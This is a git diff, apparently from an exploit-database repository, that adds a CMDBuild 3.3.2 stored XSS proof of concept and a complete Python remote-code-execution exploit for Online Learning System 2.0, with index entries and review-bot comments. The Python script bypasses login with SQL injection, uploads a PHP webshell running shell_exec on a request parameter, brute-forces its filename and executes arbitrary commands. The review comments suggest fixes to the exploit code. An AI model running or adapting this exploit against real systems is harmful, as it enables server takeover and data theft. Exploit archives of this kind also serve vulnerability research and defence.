diff --git a/exploits/multiple/webapps/50527.txt b/exploits/multiple/webapps/50527.txt
new file mode 100644
index 000000000..686c51ded
--- /dev/null
+++ b/exploits/multiple/webapps/50527.txt
@@ -0,0 +1,81 @@ +# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS) +# Date: 15/11/2021 +# Exploit Author: Hosein Vita +# Vendor Homepage: https://www.cmdbuild.org +# Software Link: https://www.cmdbuild.org/en/download/latest-version +# Version: CMDBuild 3.3.2 +# Tested on: Linux + +Summary: + +Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections + +Proof of concepts : + +Stored Xss Example: + +1-Login to you'r Dashboard As a low privilege user +2-Click On Basic archives and Employee +3- +Add card Employee +4- Enter your xss payload in parameters +5-On added employee click on "Open Relation Graph" + +POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1 +... +Cmdbuild-Actionid: class.card.new.open +Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353 + +Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K +X-Requested-With: XMLHttpRequest +Content-Length: 302 +Connection: close + +{"_type":"Employee","_tenant":"","Code":"\">","Description":null,"Surname":"\">","Name":"\">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null} + + +------------------------------------------------------------------------ + + +File upload Xss example: + +1-Click on Basic archives +2-Click on Workplace - + Add card Workplace +3-Select "attachments" icon - +Add attachment + image +4-Upload your svg file with xss payload +5-Click on preview and Right click open in new tab + + + +Request: +POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1 +Cmdbuild-Actionid: class.card.attachments.open + +-----------------------------269319782833689825543405205260 +Content-Disposition: form-data; name="file"; filename="kiwi.svg" 
+Content-Type: image/svg+xml + + + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/50526.py b/exploits/php/webapps/50526.py new file mode 100755 index 000000000..0e76304ca --- /dev/null +++ b/exploits/php/webapps/50526.py 
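Review bot: The Summary paragraph describes the issue as affecting Tecnoteca CMDBuild 3.3.1 while the `# Version:` header, the title and the files_exploits.csv entry all say 3.3.2; the advisory should state one tested version consistently, e.g. `Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.2 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document.` The trailing fragment `Almost all add sections` reads as an unfinished sentence and would be clearer as `Almost all "Add" sections are affected.` Several reproduction lines (`3-`, `Add attachment` / `image`) and the two request bodies appear to have lost inline markup in this rendering, so their completeness could not be checked here.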
@@ -0,0 +1,110 @@
+# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
+# Date: 15/11/2021
+# Exploit Author: djebbaranon
+# Vendor Homepage: https://github.com/oretnom23
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
+# Version: 2.0
+# Tested on: Kali linux / Windows 10
+# CVE : CVE-2021-42580
+
+#!/usr/bin/python3
+import os
+import time
+import argparse
+import requests
+import sys
+from colorama import init
+from colorama import Fore
+from colorama import Back
+from colorama import Style
+init(autoreset=True)
+def banner():
+ print('''
+
+ _____ _ _ _ _ _____ ______ _____ _____
+| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
+| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
+| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
+\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
+ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
+ __/ |
+ |___/
+ Written by djebbaranon
+ twitter : @dj3bb4ran0n1
+ zone-h : http://zone-h.org/archive/notifier=djebbaranon
+''')
+banner()
+def my_args():
+ parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
+ parser.add_argument("-u","--url",type=str,required=True,help="url of target")
+ parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
+ parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
+ my_arguments = parser.parse_args()
+ return my_arguments
+def login_with_sqli_login_bypass(user,passw):
+ global session
+ global url
+ global cookies
+ url = my_args().url
+ session = requests.Session()
+ data = {
+ "username" : user,
+ "password" : passw,
+ }
+ try:
+ response = session.post(url +
"/classes/Login.php?f=login",data=data,verify=False) + print( Fore.GREEN + "[+] Logged in succsusfully") + cookies = response.cookies.get_dict() + print("[+] your cookie : ") + except requests.HTTPError as exception: + print(Fore.RED + "[-] HTTP Error : {}".format(exception)) + sys.exit(1) +login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -") +def main(shell_name,renamed_shell): + try: + payload ={ + "id" : "", + "faculty_id" : "test", + "firstname" : "test", + "lastname" : "test", + "middlename" : "fsdfsd", + "dob" : "2021-10-29", + "gender": "Male", + "department_id" : "1", + "email" : "zebi@gmail.com", + "contact" : "zebii", + "address" : "zebii", + } + files = { + "img" : + ( + shell_name, + "

nikmok

\" . shell_exec($_REQUEST['cmd']) . \"\"?>", + "application/octet-stream", + ) + } + vunlerable_file = "/classes/Master.php?f=save_faculty" + print("[*] Trying to upload webshell ....") + response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files) + print("[+] trying to bruteforce the webshell ....") + rangee = my_args().range + for i in range(0,rangee): + try: + with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3: + if "nikmok" in response3.text and response3.status_code == 200: + print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n") + break + with open("shell.txt",mode="w+") as writer: + writer.write(response3.url) + else: + print( Fore.RED + "[-] shell not found : " + response3.url) + except requests.HTTPError as exception2: + print("[-] HTTP Error : {0} ".format(exception2)) + except requests.HTTPError as error: + print("[-] HTTP Error : ".format(error)) + command = my_args().command + with requests.get(response3.url.replace("whoami",command)) as response4: + print("[*] Executing {} ....".format(command)) + time.sleep(3) + print("\n" + Style.BRIGHT + Fore.GREEN + response4.text) +main("hackerman.php","") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1103eaa20..08c610881 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
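Review bot: `print("[-] HTTP Error : ".format(error))` in the outer `except` at the end of `main` has no `{}` placeholder, so the caught exception text is silently dropped; it should read `print("[-] HTTP Error : {}".format(error))`, matching the handler in `login_with_sqli_login_bypass`. All three `except requests.HTTPError` handlers are dead as written, because `requests` only raises `HTTPError` from `raise_for_status()`, which is never called here, so a 4xx/5xx reply falls through as an ordinary response and the handlers never run. `os` and `Back` are imported but unused, and `login_with_sqli_login_bypass(...)` and `main(...)` execute at module import instead of under an `if __name__ == "__main__":` guard, which also means `my_args()` re-parses `sys.argv` three times. The `files` tuple between `shell_name,` and `"application/octet-stream"` looks truncated in this rendering, so that part of the hunk was not reviewed.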
@@ -44622,3 +44622,5 @@ id,file,description,date,author,type,platform,port 50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php, 50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php, 50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php, +50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php, +50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,